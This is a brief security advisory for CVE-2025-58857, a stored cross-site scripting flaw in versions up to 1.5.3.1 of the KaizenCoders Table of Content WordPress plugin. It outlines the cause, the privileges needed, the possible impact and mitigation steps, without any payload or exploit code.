CVE-2025-58857

The KaizenCoders Table of Content WordPress plugin (content-table) versions up to and including 1.5.3.1 suffer from a stored cross-site scripting (XSS) vulnerability, identified as CVE-2025-58857. The root cause is improper neutralization of user-supplied input during web page generation, allowing arbitrary script code to be permanently stored on the server [1].

Exploitation requires a user with the appropriate privilege level (e.g., a contributor or editor) to submit a crafted payload through the plugin's content settings. The stored script then executes in the browser of any higher-privileged user (e.g., administrator) who views the affected page, triggered without additional user interaction beyond loading the page [1].

A successful attack can lead to session hijacking, defacement, or redirection to malicious sites. Administrators could have their credentials stolen or be tricked into performing actions on behalf of the attacker, effectively compromising the entire WordPress installation [1].

Patched versions are not explicitly mentioned in the reference; however, immediate updating of the plugin to any available later release is strongly recommended. If an update is not yet available, administrators should limit editing privileges to trusted users and consider using a Web Application Firewall (WAF) to block malicious input [1].